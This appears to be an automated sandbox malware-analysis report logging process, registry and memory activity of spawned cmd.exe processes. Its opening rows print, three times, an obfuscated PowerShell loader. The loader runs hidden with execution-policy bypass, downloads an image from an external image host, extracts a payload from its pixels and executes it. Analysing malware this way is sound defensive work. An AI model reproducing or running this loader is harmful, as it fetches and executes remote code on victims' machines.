Environment	Get Environment String	name = $_'}, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = \[,#, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = ,`, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Process	Create	process_name = cmd.exe	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 26	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 1	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 4	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 13	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xb3c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xb44, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn

Process #8: cmd.exe

60

0

»

Information	Value
ID	#8
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c ^ft^Y^p^e \| ^f^iN^d^S^t^r ^c^m
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:42, Reason: Child Process
Unmonitor	End Time: 00:01:44, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xb24
Parent PID	0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B28

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00044fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x0003ffff	Private Memory	rw	-
pagefile_0x0000000000040000	0x00040000	0x00046fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00153fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	r	-
locale.nls	0x00170000	0x001d6fff	Memory Mapped File	r	-
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	rw	-
private_0x0000000000200000	0x00200000	0x002fffff	Private Memory	rw	-
private_0x0000000000300000	0x00300000	0x003fffff	Private Memory	rw	-
pagefile_0x0000000000400000	0x00400000	0x00587fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000590000	0x00590000	0x00710fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000720000	0x00720000	0x01b1ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001b20000	0x01b20000	0x01e62fff	Pagefile Backed Memory	r	-
private_0x0000000001e70000	0x01e70000	0x01e70fff	Private Memory	rw	-
private_0x0000000001e80000	0x01e80000	0x01f7ffff	Private Memory	rw	-
sortdefault.nls	0x01f80000	0x0224efff	Memory Mapped File	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xb28

60

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:15 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 140603	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xb2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\findstr.exe, os_pid = 0xb34, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #9: cmd.exe

300

0

»

Information	Value
ID	#9
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /S /D /c" ftYpe "
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:42, Reason: Child Process
Unmonitor	End Time: 00:01:44, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xb2c
Parent PID	0xb24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B30

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00044fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x00000000001b0000	0x001b0000	0x002affff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x0046ffff	Private Memory	rw	-
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
pagefile_0x0000000000620000	0x00620000	0x007a7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007b0000	0x007b0000	0x00930fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000940000	0x00940000	0x01d3ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001d40000	0x01d40000	0x02082fff	Pagefile Backed Memory	r	-
private_0x0000000002090000	0x02090000	0x0218ffff	Private Memory	rw	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff0e0000	0x7feff1bafff	Memory Mapped File	rwx	-
sechost.dll	0x7feff1c0000	0x7feff1defff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7feffc50000	0x7feffd7cfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdefff	Private Memory	rw	-

Threads

Thread 0xb30

300

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:15 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 140728	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7feff0e0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyW, address_out = 0x7feff0fbf20	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
